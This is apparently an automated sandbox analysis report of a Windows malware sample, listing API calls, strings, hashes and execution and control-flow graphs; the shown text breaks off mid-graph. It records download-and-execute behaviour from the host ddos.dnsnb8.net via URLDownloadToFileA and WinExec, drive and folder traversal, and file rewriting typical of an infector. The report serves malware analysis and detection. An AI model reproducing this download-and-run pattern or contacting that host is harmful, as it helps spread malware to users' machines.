                            • Part of subcall function 009599C2: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,00955558,?,00979208,00951E83,?,00951E83), ref: 00959A22
                            • Part of subcall function 0095D05B: IsProcessorFeaturePresent.KERNEL32(00000017,00951E5A,?,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 0095D077
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                          • String ID: csm
                          • API String ID: 1924019822-1018135373
                          • Opcode ID: bb8b9ad697d0962252fc0d170984542be77fba9e032476326a2a7d3ca123c1ac
                          • Instruction ID: 298a434f1a06b1786ca6c8cd7479777f64796432a75da2d8a7304e7cfecf6749
                          • Opcode Fuzzy Hash: bb8b9ad697d0962252fc0d170984542be77fba9e032476326a2a7d3ca123c1ac
                          • Instruction Fuzzy Hash: 63218332D00218DBCF35DFA7D845AAEB7B9EF44712F940409EC06AB191DB70AD49CB91
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 00952443
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0095247B
                            • Part of subcall function 009566DD: _Yarn.LIBCPMT ref: 009566FC
                            • Part of subcall function 009566DD: _Yarn.LIBCPMT ref: 00956720
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 1908188788-1405518554
                          • Opcode ID: 3a8b443b619068a94765a652bb179746a53c05288b7b42643f913412d945c21b
                          • Instruction ID: b0d6d6562faae2bcff52c71bb9dd091c33a52e01c4e78e7f12755b4575d13962
                          • Opcode Fuzzy Hash: 3a8b443b619068a94765a652bb179746a53c05288b7b42643f913412d945c21b
                          • Instruction Fuzzy Hash: BCF01D71505B409E8330DF6B9481547FBE4BE69251390CA2EE0DEC3A12D770A408CBA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: CommandLine
                          • String ID: $G
                          • API String ID: 3253501508-4251033865
                          • Opcode ID: a70cad76b5bc37b2ec6c10505b8969b43a7d1cf4ad838dfc3594472f89e3520c
                          • Instruction ID: 7872f66fac3b04cd2a22d095b117a7c41c2b74cde29437864b472fd015211420
                          • Opcode Fuzzy Hash: a70cad76b5bc37b2ec6c10505b8969b43a7d1cf4ad838dfc3594472f89e3520c
                          • Instruction Fuzzy Hash: F1B092F9878201CFC7018F30B80C3143BA0B2882123800055D80DCA320E7342082FF41

                          Execution Graph

                          Execution Coverage:32.2%
                          Dynamic/Decrypted Code Coverage:10.4%
                          Signature Coverage:14.5%
                          Total number of Nodes:297
                          Total number of Limit Nodes:12
                          execution_graph 1011 8014e1 1012 801541 1011->1012 1013 8014fd GetModuleHandleA 1011->1013 1015 801573 1012->1015 1019 801549 1012->1019 1014 80151a VirtualQuery 1013->1014 1017 801512 1013->1017 1014->1017 1022 801638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1015->1022 1017->1012 1018 801566 1019->1018 1039 801af9 1019->1039 1020 801579 ExitProcess 1023 80167a 1022->1023 1024 80167f 1022->1024 1057 80139f GetVersionExA 1023->1057 1045 801718 GetSystemTimeAsFileTime 1024->1045 1027 801686 1028 8016ca 1027->1028 1031 8016a0 CreateThread 1027->1031 1029 8016d0 1028->1029 1030 8016d7 1028->1030 1078 801581 1029->1078 1033 8016dd lstrcpy 1030->1033 1034 80170f 1030->1034 1050 802c48 memset 1031->1050 1294 801099 1031->1294 1033->1020 1034->1020 1038 801718 3 API calls 1038->1028 1040 801b11 1039->1040 1041 801b09 1039->1041 1042 801b16 CreateThread 1040->1042 1044 801b0f 1040->1044 1043 801638 188 API calls 1041->1043 1042->1044 1313 801638 189 API calls 1042->1313 1043->1044 1044->1018 1044->1044 1046 801754 1045->1046 1047 801735 SHSetValueA 1045->1047 1048 80175a SHGetValueA 1046->1048 1049 801786 __aulldiv 1046->1049 1047->1049 1048->1049 1049->1027 1084 801973 PathFileExistsA 1050->1084 1053 802cb2 1055 8016ba WaitForSingleObject 1053->1055 1056 802cbb VirtualFree 1053->1056 1054 802c8f CreateThread WaitForMultipleObjects 1054->1053 1106 802b8c memset GetLogicalDriveStringsA 1054->1106 1055->1038 1056->1055 1058 8014da 1057->1058 1059 8013cf LookupPrivilegeValueA 1057->1059 1058->1024 1060 8013ef 1059->1060 1061 8013e7 1059->1061 1060->1058 1279 80120e GetModuleHandleA GetProcAddress 1060->1279 1274 80119f GetCurrentProcess OpenProcessToken 1061->1274 1067 801448 GetCurrentProcessId 1067->1058 1068 801457 1067->1068 1068->1058 1069 801319 3 API calls 1068->1069 1070 80147f 1069->1070 1071 801319 3 API calls 1070->1071 1072 80148e 1071->1072 1072->1058 1073 801319 3 API calls 1072->1073 1074 8014b4 1073->1074 1075 801319 3 API calls 1074->1075 1076 8014c3 1075->1076 1077 801319 3 API calls 1076->1077 1077->1058 1293 80185b GetSystemTimeAsFileTime srand rand srand rand 1078->1293 1080 801592 wsprintfA wsprintfA lstrlen CreateFileA 1081 801633 1080->1081 1082 8015fb WriteFile CloseHandle 1080->1082 1081->1034 1082->1081 1083 80161d ShellExecuteA 1082->1083 1083->1081 1085 8019a0 1084->1085 1087 801ac7 1084->1087 1086 8019af CreateFileA 1085->1086 1088 8019c4 Sleep 1086->1088 1089 801a28 GetFileSize 1086->1089 1087->1053 1087->1054 1088->1086 1090 8019d5 1088->1090 1091 801a38 1089->1091 1097 801a80 1089->1097 1105 80185b GetSystemTimeAsFileTime srand rand srand rand 1090->1105 1092 801a3d VirtualAlloc 1091->1092 1091->1097 1092->1097 1102 801a53 1092->1102 1093 801a96 1100 801aad 1093->1100 1104 801a9c DeleteFileA 1093->1104 1094 801a8d FindCloseChangeNotification 1094->1093 1096 8019da wsprintfA CopyFileA 1096->1089 1101 801a0d CreateFileA 1096->1101 1097->1093 1097->1094 1098 801a59 ReadFile 1098->1097 1098->1102 1100->1087 1103 801ab8 VirtualFree 1100->1103 1101->1089 1101->1104 1102->1097 1102->1098 1103->1087 1104->1100 1105->1096 1107 802bc8 1106->1107 1108 802c09 WaitForMultipleObjects 1106->1108 1109 802bfa lstrlen 1107->1109 1112 802bd2 GetDriveTypeA 1107->1112 1113 802be3 CreateThread 1107->1113 1110 802c2a CreateThread 1108->1110 1111 802c3c 1108->1111 1109->1107 1109->1108 1110->1111 1117 802845 1110->1117 1112->1107 1112->1109 1113->1109 1114 802b7d 1113->1114 1127 8029e2 memset wsprintfA 1114->1127 1264 80274a memset memset SHGetSpecialFolderPathA wsprintfA 1117->1264 1119 802878 DeleteFileA 1120 80289a 1119->1120 1121 80288c VirtualFree 1119->1121 1123 8028a4 CloseHandle 1120->1123 1124 8028ab 1120->1124 1121->1120 1122 802692 8 API calls 1125 802853 1122->1125 1123->1124 1125->1119 1125->1122 1126 80239d 186 API calls 1125->1126 1126->1125 1128 802a3a memset lstrlen lstrcpyn strrchr 1127->1128 1129 802abc memset memset FindFirstFileA 1127->1129 1128->1129 1131 802a88 1128->1131 1141 8028b8 memset wsprintfA 1129->1141 1131->1129 1133 802a9a lstrcmpiA 1131->1133 1134 802b74 1133->1134 1135 802aad lstrlen 1133->1135 1135->1129 1135->1133 1136 802b61 FindNextFileA 1137 802b23 1136->1137 1138 802b6d FindClose 1136->1138 1139 802b35 lstrcmpiA 1137->1139 1140 8028b8 174 API calls 1137->1140 1138->1134 1139->1137 1139->1138 1140->1136 1142 802905 1141->1142 1147 802951 memset 1141->1147 1143 802956 strrchr 1142->1143 1144 80291b memset wsprintfA 1142->1144 1142->1147 1146 802967 lstrcmpiA 1143->1146 1143->1147 1145 8029e2 180 API calls 1144->1145 1145->1147 1148 802988 lstrcmpiA 1146->1148 1149 80297a 1146->1149 1147->1136 1148->1147 1150 802994 1148->1150 1159 801e6e 1149->1159 1152 8029ad strstr 1150->1152 1153 8029a5 lstrcpy 1150->1153 1154 8029d3 1152->1154 1155 8029cb 1152->1155 1153->1152 1224 802692 1154->1224 1202 80239d strstr 1155->1202 1160 801e7d 1159->1160 1233 801df6 strrchr 1160->1233 1163 801eb0 SetFileAttributesA CreateFileA 1164 802332 1163->1164 1165 801edf 1163->1165 1166 802346 1164->1166 1167 80233d UnmapViewOfFile 1164->1167 1238 801915 1165->1238 1169 802350 1166->1169 1170 80234b FindCloseChangeNotification 1166->1170 1167->1166 1172 802391 1169->1172 1173 802356 CloseHandle 1169->1173 1170->1169 1172->1147 1173->1172 1174 801f2e 1174->1164 1244 801c81 1174->1244 1178 801f92 1179 801c81 2 API calls 1178->1179 1180 801f9f 1179->1180 1180->1164 1181 801af9 169 API calls 1180->1181 1183 802024 1180->1183 1186 801fc0 1181->1186 1182 801af9 169 API calls 1184 80207a 1182->1184 1183->1164 1183->1182 1185 801af9 169 API calls 1184->1185 1190 802090 1185->1190 1186->1164 1186->1183 1187 801af9 169 API calls 1186->1187 1188 801ffe 1187->1188 1189 802013 FlushViewOfFile 1188->1189 1189->1183 1191 8020bb memset memset 1190->1191 1192 8020f5 1191->1192 1193 801c81 2 API calls 1192->1193 1194 8021de 1193->1194 1195 802226 memcpy UnmapViewOfFile CloseHandle 1194->1195 1249 801b8a 1195->1249 1197 80226e 1257 80185b GetSystemTimeAsFileTime srand rand srand rand 1197->1257 1199 8022ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1200 801915 3 API calls 1199->1200 1201 80231f FindCloseChangeNotification 1200->1201 1201->1164 1203 802451 CreateFileA GetFileSize 1202->1203 1208 8023d8 1202->1208 1204 802480 1203->1204 1205 802675 CloseHandle 1203->1205 1204->1205 1209 802499 1204->1209 1206 80267c RemoveDirectoryA 1205->1206 1207 802687 1206->1207 1207->1147 1208->1203 1208->1207 1210 801915 3 API calls 1209->1210 1211 8024a4 9 API calls 1210->1211 1259 80189d memset CreateProcessA 1211->1259 1214 80255c Sleep memset wsprintfA 1215 8029e2 163 API calls 1214->1215 1216 802597 memset wsprintfA Sleep 1215->1216 1217 80189d 6 API calls 1216->1217 1218 8025e4 Sleep CreateFileA 1217->1218 1219 801915 3 API calls 1218->1219 1220 802610 CloseHandle 1219->1220 1220->1206 1221 80261e 1220->1221 1221->1206 1222 802641 SetFilePointer WriteFile 1221->1222 1222->1206 1223 802667 SetEndOfFile 1222->1223 1223->1206 1225 8026b2 WaitForSingleObject 1224->1225 1226 8026a2 CreateEventA 1224->1226 1227 8026c1 lstrlen ??2@YAPAXI 1225->1227 1228 802708 1225->1228 1226->1225 1229 802736 SetEvent 1227->1229 1230 8026da lstrcpy 1227->1230 1228->1229 1232 802718 lstrcpy ??3@YAXPAX 1228->1232 1229->1147 1231 8026f1 1230->1231 1231->1229 1232->1231 1234 801e62 1233->1234 1235 801e13 lstrcpy strrchr 1233->1235 1234->1163 1234->1164 1235->1234 1236 801e40 lstrcmpiA 1235->1236 1236->1234 1237 801e52 lstrlen 1236->1237 1237->1234 1237->1236 1239 801924 SetFilePointer CreateFileMappingA MapViewOfFile 1238->1239 1240 801928 1238->1240 1239->1164 1239->1174 1241 80192e memset GetFileTime 1240->1241 1242 80194f 1240->1242 1241->1239 1242->1239 1243 801954 SetFileTime 1242->1243 1243->1239 1245 801c9c 1244->1245 1247 801c94 1244->1247 1246 801cae memset memset 1245->1246 1245->1247 1246->1247 1247->1164 1248 80185b GetSystemTimeAsFileTime srand rand srand rand 1247->1248 1248->1178 1250 801b93 1249->1250 1258 80185b GetSystemTimeAsFileTime srand rand srand rand 1250->1258 1252 801bca srand 1253 801bd8 rand 1252->1253 1254 801c08 1253->1254 1254->1253 1255 801c29 memset memcpy lstrcat 1254->1255 1255->1197 1257->1199 1258->1252 1260 8018e0 CloseHandle WaitForSingleObject 1259->1260 1261 80190c 1259->1261 1262 801907 CloseHandle 1260->1262 1263 8018fb GetExitCodeProcess 1260->1263 1261->1206 1261->1214 1262->1261 1263->1262 1273 80185b GetSystemTimeAsFileTime srand rand srand rand 1264->1273 1266 8027b5 wsprintfA CopyFileA 1267 802840 1266->1267 1268 8027de wsprintfA 1266->1268 1267->1125 1269 801973 17 API calls 1268->1269 1270 80280f 1269->1270 1271 802820 CreateFileA 1270->1271 1272 802813 DeleteFileA 1270->1272 1271->1267 1272->1271 1273->1266 1275 801200 CloseHandle 1274->1275 1276 8011c6 AdjustTokenPrivileges 1274->1276 1275->1060 1277 8011f6 1276->1277 1278 8011f7 CloseHandle 1276->1278 1277->1278 1278->1275 1280 801310 1279->1280 1281 80123f GetCurrentProcessId OpenProcess 1279->1281 1280->1058 1288 801319 1280->1288 1281->1280 1284 801262 1281->1284 1282 8012b0 VirtualAlloc 1282->1284 1287 8012b8 1282->1287 1283 8012f1 CloseHandle 1283->1280 1285 801302 VirtualFree 1283->1285 1284->1282 1284->1283 1286 801296 VirtualFree 1284->1286 1284->1287 1285->1280 1286->1282 1287->1283 1289 80134a 1288->1289 1290 80132a GetModuleHandleA GetProcAddress 1288->1290 1291 801351 memset 1289->1291 1292 801363 1289->1292 1290->1289 1290->1292 1291->1292 1292->1058 1292->1067 1293->1080 1295 8010ba 1294->1295 1296 801196 1294->1296 1295->1296 1312 80185b GetSystemTimeAsFileTime srand rand srand rand 1295->1312 1298 801118 wsprintfA wsprintfA URLDownloadToFileA 1299 801168 lstrlen Sleep 1298->1299 1300 8010dc 1298->1300 1299->1295 1303 801000 CreateFileA 1300->1303 1304 801092 WinExec lstrlen 1303->1304 1305 801025 GetFileSize CreateFileMappingA MapViewOfFile 1303->1305 1304->1295 1304->1296 1306 801057 1305->1306 1307 80107b 1305->1307 1308 801061 1306->1308 1309 801074 UnmapViewOfFile 1306->1309 1310 801087 CloseHandle 1307->1310 1311 80108d CloseHandle 1307->1311 1308->1309 1309->1307 1310->1311 1311->1304 1312->1298 1340 802361 1341 802374 1340->1341 1342 80236b UnmapViewOfFile 1340->1342 1343 802382 1341->1343 1344 802379 CloseHandle 1341->1344 1342->1341 1345 802388 CloseHandle 1343->1345 1346 802391 1343->1346 1344->1343 1345->1346 1347 806014 1348 80605f 1347->1348 1349 806035 GetModuleHandleA 1347->1349 1350 80604d GetProcAddress 1349->1350 1351 806058 1350->1351 1351->1348 1351->1350 1351->1351 1314 806076 1315 80607b 1314->1315 1320 8060c7 1314->1320 1317 8060b0 VirtualAlloc 1315->1317 1315->1320 1326 8061b2 1315->1326 1316 80615f VirtualFree 1316->1320 1317->1320 1318 806198 VirtualFree 1318->1326 1319 8060d5 VirtualAlloc 1319->1320 1320->1316 1320->1318 1320->1319 1321 806389 VirtualProtect 1324 8063b7 1321->1324 1322 8063fc VirtualProtect 1323 806400 1322->1323 1324->1322 1325 8063e7 VirtualProtect 1324->1325 1325->1322 1325->1324 1326->1321 1327 8062fb 1326->1327 1328 806159 VirtualFree 1333 8060c7 1328->1333 1329 806198 VirtualFree 1331 8061b2 1329->1331 1330 8060d5 VirtualAlloc 1330->1333 1332 806389 VirtualProtect 1331->1332 1339 8062fb 1331->1339 1337 8063b7 1332->1337 1333->1329 1333->1330 1335 80615f VirtualFree 1333->1335 1334 8063fc VirtualProtect 1336 806400 1334->1336 1335->1333 1337->1334 1338 8063e7 VirtualProtect 1337->1338 1338->1334 1338->1337

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00801000 36 Function_008017D0 0->36 1 Function_00806D00 27 Function_008069B0 1->27 44 Function_00806B63 1->44 48 Function_00806CF2 1->48 2 Function_00806001 7 Function_0080600A 2->7 3 Function_00801C81 4 Function_00801581 38 Function_0080185B 4->38 5 Function_00806B02 5->44 6 Function_00806A84 12 Function_0080680F 6->12 6->48 8 Function_00801B8A 8->38 9 Function_00801D8A 10 Function_00802B8C 32 Function_00802845 10->32 54 Function_00802B7D 10->54 11 Function_0080120E 13 Function_00802692 14 Function_00806012 15 Function_00806014 16 Function_00801915 17 Function_00801718 47 Function_00802CF0 17->47 18 Function_00801319 19 Function_00801099 19->0 19->38 20 Function_00802D9B 21 Function_0080189D 22 Function_0080239D 22->16 22->21 43 Function_008029E2 22->43 23 Function_0080119F 24 Function_0080139F 24->11 24->18 24->23 25 Function_008067A4 26 Function_008065A6 28 Function_00806834 29 Function_00806734 29->1 29->5 29->6 30 Function_008028B8 30->13 30->22 30->43 46 Function_00801E6E 30->46 31 Function_00801638 31->4 31->17 31->19 31->24 33 Function_00802C48 31->33 31->36 32->13 32->22 35 Function_0080274A 32->35 33->10 49 Function_00801973 33->49 34 Function_008066C8 34->1 34->5 34->6 35->38 35->49 37 Function_00806159 37->34 39 Function_0080235D 40 Function_00802D60 41 Function_008014E1 41->31 53 Function_00801AF9 41->53 42 Function_00802361 42->20 43->30 44->25 44->27 44->28 45 Function_00801C68 46->3 46->8 46->9 46->16 46->20 46->38 46->40 46->45 51 Function_00801DF6 46->51 46->53 52 Function_00806CF8 48->52 49->38 50 Function_00806076 50->34 53->31 54->43

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                          • String ID: %s*$C:\$Documents and Settings
                          • API String ID: 2826467728-110786608
                          • Opcode ID: 42210977e343303e16639e0c40cb112193b02afc259adea6f8058cc3a958a55d
                          • Instruction ID: 6725396e545db62392fd60b62b520ac5061e9a8efcc3db9d027dbaf1795e04dd
                          • Opcode Fuzzy Hash: 42210977e343303e16639e0c40cb112193b02afc259adea6f8058cc3a958a55d
                          • Instruction Fuzzy Hash: C941A2B2805749AFD761EBA0DC8CDEB77ECFB84315F04092AF944C3051E674D6488BA2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 172 801099-8010b4 173 801199-80119c 172->173 174 8010ba-8010c7 172->174 175 8010c8-8010d4 174->175 176 801184-801190 175->176 177 8010da 175->177 176->175 179 801196-801198 176->179 178 801113-801162 call 80185b wsprintfA * 2 URLDownloadToFileA 177->178 182 801168-801182 lstrlen Sleep 178->182 183 8010dc-80110d call 801000 WinExec lstrlen 178->183 179->173 182->176 182->178 183->178 183->179
                          APIs
                            • Part of subcall function 0080185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
                            • Part of subcall function 0080185B: srand.MSVCRT ref: 00801878
                            • Part of subcall function 0080185B: rand.MSVCRT ref: 00801880
                            • Part of subcall function 0080185B: srand.MSVCRT ref: 00801890
                            • Part of subcall function 0080185B: rand.MSVCRT ref: 00801894
                          • WinExec.KERNEL32(?,00000005), ref: 008010F1
                          • lstrlen.KERNEL32(00804748), ref: 008010FA
                          • wsprintfA.USER32 ref: 0080112A
                          • wsprintfA.USER32 ref: 00801143
                          • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0080115B
                          • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00801169
                          • Sleep.KERNEL32 ref: 00801179
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                          • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                          • API String ID: 1280626985-3050893656
                          • Opcode ID: 29c2ee95ad49d88ff1584744156b9cc45c26491eadd4f1ea918c037ad6e0f04a
                          • Instruction ID: 00293a0c647b865e382daf0cf483ac2c759649f3c309850533a7c5ac4f44c6da
                          • Opcode Fuzzy Hash: 29c2ee95ad49d88ff1584744156b9cc45c26491eadd4f1ea918c037ad6e0f04a
                          • Instruction Fuzzy Hash: AD215EB6941208BEDFA0DBA0DC49FAEBBBCFB15325F1151A5E600E2190D7749B84CF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 216 801718-801733 GetSystemTimeAsFileTime 217 801754-801758 216->217 218 801735-801752 SHSetValueA 216->218 219 8017c6-8017cd 217->219 220 80175a-801784 SHGetValueA 217->220 218->219 220->219 221 801786-8017b3 call 802cf0 * 2 220->221 221->219 226 8017b5 221->226 227 8017b7-8017bd 226->227 228 8017bf 226->228 227->219 227->228 228->219
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801729
                          • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0080174C
                          • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0080177C
                          • __aulldiv.LIBCMT ref: 00801796
                          • __aulldiv.LIBCMT ref: 008017A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: TimeValue__aulldiv$FileSystem
                          • String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe$SOFTWARE\GTplus$Time
                          • API String ID: 541852442-4019655368
                          • Opcode ID: 04c363e130fb06d39672ea7160ec2f2476bf3e90b15f2714aa3c28d9fdb118e9
                          • Instruction ID: a94196d05f71e845c1ecf9affe5713ed58c074a725306462521eb89039eb4d0b
                          • Opcode Fuzzy Hash: 04c363e130fb06d39672ea7160ec2f2476bf3e90b15f2714aa3c28d9fdb118e9
                          • Instruction Fuzzy Hash: DD116371A00209BBEF609B94CC89FEF7BBCFB44B24F108115FA10F62C5D6B59A448B60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 806076-806079 230 8060e0-8060eb 229->230 231 80607b-806080 229->231 232 8060ee-8060f4 230->232 233 806082-806085 231->233 234 8060f7-8060f8 231->234 235 8060f6 232->235 233->235 238 806087 233->238 236 8060fa-8060fc call 8066c8 234->236 237 8060fe-806106 234->237 235->234 236->237 240 806155-806189 VirtualFree 237->240 241 806108-80611d 237->241 238->232 242 806089-806095 238->242 247 80618c-806192 240->247 244 80611f-806121 241->244 245 8060a1-8060aa 242->245 246 806097-80609f 242->246 248 806151-806154 244->248 249 806123 244->249 250 8060b0-8060c1 VirtualAlloc 245->250 251 8061ba-8061c8 245->251 246->245 252 8060c7-8060cf 247->252 253 806198-8061b0 VirtualFree 247->253 248->240 249->248 256 806125-806128 249->256 250->252 254 806243-806251 251->254 255 8061ca-8061d7 251->255 252->247 257 8060d5-8060df VirtualAlloc 252->257 253->251 260 8061b2-8061b4 253->260 258 806253 254->258 259 806264-80626f 254->259 261 8061dd-8061e0 255->261 262 806134-80613b 256->262 263 80612a-80612e 256->263 257->230 265 806255-806258 258->265 266 806271-806276 259->266 260->251 261->254 267 8061e2-8061f2 261->267 269 806130-806132 262->269 270 80613d-80614f 262->270 263->262 263->269 265->259 271 80625a-806262 265->271 272 806389-8063b1 VirtualProtect 266->272 273 80627c-806289 266->273 274 8061f5-8061fe 267->274 269->244 270->244 271->265 277 8063b7-8063ba 272->277 286 806292-806298 273->286 287 80628b 273->287 275 806200-806203 274->275 276 80620c-806219 274->276 282 806205-806208 275->282 283 80621b-806228 275->283 278 806238-80623f 276->278 279 8063fc-8063ff VirtualProtect 277->279 280 8063bc-8063c2 277->280 278->274 290 806241 278->290 285 806400-806416 279->285 280->280 284 8063c4 280->284 288 80622a-806236 282->288 289 80620a 282->289 283->278 284->279 291 8063c6-8063cf 284->291 292 806420-806425 285->292 293 806418-80641d 285->293 294 8062a2-8062ac 286->294 287->286 288->278 289->278 290->261 297 8063d1 291->297 298 8063d4-8063d8 291->298 295 8062b1-8062c8 294->295 296 8062ae 294->296 299 806373-806384 295->299 300 8062ce-8062d4 295->300 296->295 297->298 